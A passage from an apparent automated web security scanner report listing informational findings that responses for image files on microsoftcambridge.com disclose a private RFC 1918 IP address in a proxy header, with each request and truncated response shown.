Date: Sat, 26 Mar 2011 01:42:41 GMT
X-Varnish: 1939101156
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR.......".....>.......tEXtSoftware.Adobe ImageReadyq.e<..aIDATx..\[.$.Y.N]../.=.....Y..E^d.q..$&k......"....$....H~.^l"..H(......d..
..'..`v.....z...x......_.....(Z=3=..y.O:3..N.S..W..
...[SNIP]...
24.123. http://microsoftcambridge.com/img/events/people.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/events/people.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/events/people.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:12:39 GMT
Content-Length: 3144
Date: Sat, 26 Mar 2011 01:42:30 GMT
X-Varnish: 1939097245
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...6.........).N.....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.124. http://microsoftcambridge.com/img/events/people_ovr.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/events/people_ovr.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/events/people_ovr.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:12:40 GMT
Content-Length: 3146
Date: Sat, 26 Mar 2011 01:42:40 GMT
X-Varnish: 1939100804
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...6.........).N.....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.125. http://microsoftcambridge.com/img/events/search.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/events/search.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/events/search.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:12:42 GMT
Content-Length: 640
Date: Sat, 26 Mar 2011 01:42:39 GMT
X-Varnish: 1939100481
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...N.........fX.....tEXtSoftware.Adobe ImageReadyq.e<..."IDATx..W.q.0.u..W.#..`....d..!...PF.........:w...U....t..YyH.9.....6..M..V.....}p..e.g.l'!..~~.|..........y..|Y.g.!xC.b.%....
...[SNIP]...
24.126. http://microsoftcambridge.com/img/events/share.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/events/share.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/events/share.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:12:43 GMT
Content-Length: 581
Date: Sat, 26 Mar 2011 01:42:40 GMT
X-Varnish: 1939100796
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...D.........D......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..W.q.0.v.....@G0#0@_....a.x.2B......ZFHM.sO..?@t.3..#..'8|..J...k....i..r:9.N;...q.t v...........;
.....DS.>D...p%s$f.r.
...[SNIP]...
24.127. http://microsoftcambridge.com/img/events/subscribe.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/events/subscribe.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/events/subscribe.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Fri, 26 Jun 2009 19:02:53 GMT
Content-Length: 3486
Date: Sat, 26 Mar 2011 01:42:39 GMT
X-Varnish: 1939100535
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...h........E%+H....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.128. http://microsoftcambridge.com/img/events/teams.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/events/teams.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/events/teams.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:12:45 GMT
Content-Length: 3209
Date: Sat, 26 Mar 2011 01:42:30 GMT
X-Varnish: 1939097232
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR................
....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.129. http://microsoftcambridge.com/img/events/teams_ovr.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/events/teams_ovr.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/events/teams_ovr.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:12:47 GMT
Content-Length: 3209
Date: Sat, 26 Mar 2011 01:42:40 GMT
X-Varnish: 1939100805
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR................
....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.130. http://microsoftcambridge.com/img/events/working.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/events/working.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/events/working.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:12:48 GMT
Content-Length: 3527
Date: Sat, 26 Mar 2011 01:42:30 GMT
X-Varnish: 1939097262
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...l...........X.....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.131. http://microsoftcambridge.com/img/events/working_ovr.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/events/working_ovr.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/events/working_ovr.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Events/tabid/57/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:12:49 GMT
Content-Length: 3528
Date: Sat, 26 Mar 2011 01:42:41 GMT
X-Varnish: 1939101155
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...l...........X.....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.132. http://microsoftcambridge.com/img/header_back.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/header_back.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/header_back.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:12:53 GMT
Content-Length: 2840
Date: Sat, 26 Mar 2011 01:40:29 GMT
X-Varnish: 1939060084
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR.......a.............tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.133. http://microsoftcambridge.com/img/home/about.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/home/about.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/home/about.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:12:57 GMT
Content-Length: 3156
Date: Sat, 26 Mar 2011 01:40:25 GMT
X-Varnish: 1939058912
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR................
....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.134. http://microsoftcambridge.com/img/home/about_ovr.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/home/about_ovr.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/home/about_ovr.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:12:58 GMT
Content-Length: 3156
Date: Sat, 26 Mar 2011 01:40:31 GMT
X-Varnish: 1939060811
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR................
....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.135. http://microsoftcambridge.com/img/home/community.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/home/community.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/home/community.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:13:00 GMT
Content-Length: 3361
Date: Sat, 26 Mar 2011 01:40:25 GMT
X-Varnish: 1939058909
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...T............[....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.136. http://microsoftcambridge.com/img/home/community_ovr.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/home/community_ovr.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/home/community_ovr.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:13:01 GMT
Content-Length: 3361
Date: Sat, 26 Mar 2011 01:40:32 GMT
X-Varnish: 1939060916
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...T............[....tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.137. http://microsoftcambridge.com/img/home/contact_us.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/home/contact_us.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/home/contact_us.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:13:02 GMT
Content-Length: 831
Date: Sat, 26 Mar 2011 01:40:30 GMT
X-Varnish: 1939060525
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...n........H;[.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..X...0.6:..W.).I.P..R...%..B.9..p.    %...=....O.7.
...eg4.Wki.w.Qf..........x...W.1..........tD'4.?&@....Tj.w.N.\..c.MfC.i
...[SNIP]...
24.138. http://microsoftcambridge.com/img/home/events.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/home/events.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/home/events.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:13:04 GMT
Content-Length: 3249
Date: Sat, 26 Mar 2011 01:40:25 GMT
X-Varnish: 1939058882
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...5.................tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.139. http://microsoftcambridge.com/img/home/events_ovr.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/home/events_ovr.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/home/events_ovr.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Thu, 12 Feb 2009 05:13:05 GMT
Content-Length: 3248
Date: Sat, 26 Mar 2011 01:40:31 GMT
X-Varnish: 1939060817
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
...IHDR...5.................tEXtSoftware.Adobe ImageReadyq.e<..
.iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...
24.140. http://microsoftcambridge.com/img/home/footer_gallery.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://microsoftcambridge.com
Path:   /img/home/footer_gallery.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /img/home/footer_gallery.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=E6E5D631524F4DD8BB7534BAE903B96B; .ASPXANONYMOUS=OFrsmOghzAEkAAAAOTFmZjU1MzEtY2E0OS00OWM1LThjMzctZGM1OGE0ODRiZDI40; language=en-US; X-Mapping-pfddgonl=410A14DAAD5DF3986EEC751A415912F9

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Last-Modified: Fri, 12 Mar 2010 20:36:33 GMT
Content-Length: 3812
Date: Sat, 26 Mar 2011 01:40:29 GMT
X-Varnish: 1939060076
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.3.23
X-Cache: MISS

.PNG
.
